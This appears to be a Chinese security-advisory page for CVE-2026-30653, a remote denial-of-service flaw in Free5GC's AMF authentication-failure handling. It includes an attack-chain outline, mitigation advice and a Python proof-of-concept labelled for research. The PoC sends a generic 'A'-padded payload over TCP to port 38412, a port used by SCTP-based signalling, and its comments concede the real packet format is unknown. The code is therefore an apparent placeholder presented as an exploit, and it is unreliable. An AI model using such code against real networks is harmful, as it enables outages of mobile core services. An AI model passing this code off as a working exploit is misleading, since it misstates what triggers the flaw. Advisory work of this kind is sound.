CVE-2026-30653 CVSS 7.5 高危

CVE-2026-30653 Free5GC AMF组件拒绝服务漏洞

披露日期: 2026-03-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30653

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Free5GC

漏洞概述

Free5GC v4.2.0及之前版本存在严重安全漏洞，该漏洞位于AMF组件的HandleAuthenticationFailure函数中。由于未正确处理异常输入，远程攻击者无需任何认证即可利用此漏洞。攻击者通过发送特制数据包触发函数缺陷，可导致目标系统服务崩溃或资源耗尽，造成拒绝服务（DoS），严重影响5G网络的可用性。

技术细节

该漏洞源于Free5GC开源5G核心网项目中AMF（接入和移动性管理功能）组件在处理用户认证失败流程时的逻辑缺陷。攻击者可利用网络向量（AV:N），在无需用户交互（UI:N）和任何权限认证（PR:N）的情况下，向目标AMF服务端口发送恶意构造的协议数据包。当AMF组件尝试调用HandleAuthenticationFailure函数解析并处理这些异常请求时，由于缺乏必要的边界检查或异常捕获机制，触发了未定义的行为或内存错误。这导致AMF进程崩溃、挂起或资源耗尽。根据CVSS向量分析，该漏洞主要影响系统可用性（A:H），虽然未直接泄露数据或破坏完整性，但会导致5G核心网控制面瘫痪，阻断所有新用户的接入及现有用户的移动性管理，危害极大。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别Free5GC AMF组件的IP地址及开放端口（如38412）。

STEP 2

2. 漏洞探测

向AMF发送探测数据包，确认目标运行的版本是否为v4.2.0及之前。

STEP 3

3. 漏洞利用

构造特制的畸形数据包，通过网络发送至AMF组件，触发HandleAuthenticationFailure函数的异常逻辑。

STEP 4

4. 拒绝服务

AMF进程崩溃或停止响应，导致5G核心网无法处理用户接入和移动性管理请求，服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# PoC for CVE-2026-30653
# This script attempts to trigger the DoS in Free5GC AMF
# by sending a malformed packet to the AMF service.
# Note: Actual packet structure depends on the specific NAS/NGAP implementation details.

def send_exploit(target_ip, target_port):
    try:
        # Establish a TCP connection to the AMF interface
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        
        # Construct a malformed payload intended to trigger
        # the HandleAuthenticationFailure vulnerability.
        # This payload simulates a corrupted authentication failure message.
        # Example: Buffer overflow pattern or specific protocol trigger
        payload = b"\x00\x00\x00\x01" + b"A" * 1000
        
        print(f"[+] Sending payload to {target_ip}:{target_port}")
        s.send(payload)
        
        # Wait briefly to check if connection closes (crash)
        s.recv(1024)
        s.close()
        print("[+] Payload sent. Check if AMF service crashed.")
        
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    TARGET_IP = "192.168.56.101"  # Replace with actual AMF IP
    TARGET_PORT = 38412           # Common AMF port (SCTP/HTTP)
    send_exploit(TARGET_IP, TARGET_PORT)

影响范围

Free5GC <= 4.2.0

防御指南

临时缓解措施

建议在AMF前置防火墙实施严格的访问控制策略，仅允许合法的gNB（基站）IP地址连接。同时，应实时监控AMF组件的系统日志和进程状态，一旦发现异常崩溃或大量认证失败请求，应及时排查并手动重启服务以恢复业务。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-30653
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-30653
3 Details https://www.cvedetails.com/cve/CVE-2026-30653/
4 VulDB https://vuldb.com/cve/CVE-2026-30653
5 Link https://github.com/free5gc/free5gc/issues/826

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表